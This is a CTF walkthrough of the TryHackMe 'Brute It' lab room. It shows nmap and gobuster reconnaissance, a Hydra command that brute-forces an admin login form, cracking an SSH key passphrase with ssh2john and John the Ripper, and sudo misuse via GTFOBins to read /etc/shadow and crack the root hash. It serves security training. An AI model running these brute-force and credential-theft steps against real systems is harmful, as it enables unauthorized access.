TryHackMe | Brute It Walkthrough
Hi there, I’m glad to see you here. In this article, we’ll solve together the “Brute It” room in TryHackMe. In some sections, I’ll share brief about the subject. Don’t forget! You must always research to learn more. I hope it will be helpful for you. Let’s start!
Contents:
-Reconnaissance
-Brute Force
-Hash Cracking
-Privilege Escalation
Deploy the machine
Connect to the TryHackMe network, and deploy the machine.
Step 1: You need openvpn configuration file to connect with VPN to machines in TryHackMe.
Step 2: Use openvpn command and start your VPN connection.
Step 3: Can you see the IP address of the machine?
Step 4: You can check your connection.
Reconnaissance
Before attacking, let’s get information about the target.
Answer the questions below
Q1: Search for open ports using nmap. How many ports are open?
A1: 2
Firstly, we need to run a nmap scan to find out which ports are open and which services are running on these ports.
Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing.
nmap -A -T4 -O -p- 10.10.145.133-A : Enable OS detection, version detection, script scanning and traceroute.
-T4 : Set timing template (higher is faster).
-O : Enable OS detection.
-p- : You can specify “-p-” to scan ports from 1 through 65535.
Q2: What version of SSH is running?
A2: OpenSSH 7.6p1
The SSH protocol (also referred to as Secure Shell) is a method for secure remote login from one computer to another.
OpenSSH is an open-source implementation of the SSH protocol. It is based on the free version by Tatu Ylonen and further developed by the OpenBSD team and the user community.
Q3: What version of Apache is running?
A3: 2.4.29
Apache is a free and open-source software that allows users to deploy their websites on the internet. It is one of the oldest and most reliable web server software maintained by the Apache Software Foundation, with the first version released in 1995.
Q4: Which Linux distribution is running?
A4: Ubuntu
Q5: Search for hidden directories on web server. What is the hidden directory?
A5: /admin
We can use the gobuster tool to find hidden directories.
Gobuster is a tool used to brute-force URIs including directories and files as well as DNS subdomains.
gobuster dir -u http://10.10.145.133/ -w <wordlist>dir : Uses directory/file enumeration mode.
-u : We can use the option “-u” to specify the target domain or subdomain you want to dig into the hidden directories and files.
-w : Path to the wordlist.
Let’s check the page source for more information about the web page.
The page source can give us important information. This is the original text and HTML tags typed by the author and interpreted by the browser to produce the Web page you actually SEE on the Internet. That’s why never forget to look here.
I think there is a username here where we can access the admin page.
Getting a Shell
Find a form to get a shell on SSH.
Answer the questions below
Q1: What is the user:password of the admin panel?
A1: ************
When we try the default username and password, we get the following error message. You’re right, it can’t be that easy.
By looking at the request, we can see that the website is using the POST method to login.
POST is the HTTP method that is designed to send loads of data to a server from a specified resource. Most common HTML forms on the web operate using this request method.
We see a section called Request payload that contains the username and password we entered. We need all of this request for Hydra to use.
Finally, we just need a way to let Hydra know whether or not we successfully logged-in. Since we can’t see what the page looks like upon a successful login, we’ll need to specify what the page looks like on a failed login.
Hydra is a parallelized login cracker which supports numerous protocols to attack.
hydra -l <Login_Name> -P <wordlist> 10.10.145.133 http-post-form '/admin/:user=^USER^&pass=^PASS^:Username or password invalid'-l: login with LOGIN name
-P: load several passwords from FILE
[machine IP]: the IP address of the target machine
Q2: Crack the RSA key you found. What is John’s RSA Private Key passphrase?
A2: **********
Do you remember which ports are open as a result of the nmap scan? When we looked at the nmap scan result, we found that the SSH service was running on port 22. Maybe we can use the private key for ssh connection.
RSA key is a private key based on RSA algorithm. Private Key is used for authentication and a symmetric key exchange.
We can use the wget command to download the key to our machine.
Wget is a command-line utility for downloading files from the web.
We can use the special John the Ripper tool called ssh2john.py which can extract the crackable hash from the RSA private key.
Ssh2john is part of John the Reaper suite. This is a script that basically transforms [RSA/DSA/EC/OPENSSH (SSH private keys)] private key to john format for later cracking using JtR.
Now we can use John the Ripper to crack this hash and extract the SSH private key password.
John the Ripper is a popular open source password cracking tool that combines several different cracking programs and runs in both brute force and dictionary attack modes.
Q3: user.txt
A3: ********************************
Now we can get in using the RSA private key.
Congratulations! You found the first flag.
Q4: Web flag
A4: ************************
Congratulations! You found the second flag.
Privilege Escalation
Now, we need to escalate our privileges.
Answer the questions below
Q1: Find a form to escalate your privileges. What is the root’s password?
A1: ********
Sudo (Super User DO) command in Linux is generally used as a prefix of some command that only superuser are allowed to run.
sudo -l : The -l (list) option will print out the commands allowed (and forbidden) the user on the current host.
Google search time!
GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.
A shadow password file, also known as /etc/shadow, is a system file in Linux that stores encrypted user passwords and is accessible only to the root user, preventing unauthorized users or malicious actors from breaking into the system.
This time we can crack the root user’s hash using john the ripper.
Q2: root.txt
A2: *************************
su is an acronym for switch user or substitute user. You are basically switching to a particular user and you need the password for the user you are switching to. Most often, the user account you switch to is the root account but it can be any account on the system.
Congratulations! You found the third flag.
Thank you for your time. See you soon! Until that time.. Happy Hacking ❤
Resources:
https://www.ssh.com/academy/ssh/openssh
https://www.kali.org/tools/gobuster
https://infinitelogins.com/2020/02/22/how-to-brute-force-websites-using-hydra
https://rapidapi.com/blog/api-glossary/post
https://www.kali.org/tools/hydra
https://www.techtarget.com/whatis/definition/John-the-Ripper
https://www.geeksforgeeks.org/sudo-command-in-linux-with-examples
https://gtfobins.github.io/gtfobins/cat/#sudo
https://www.techtarget.com/searchsecurity/definition/shadow-password-file
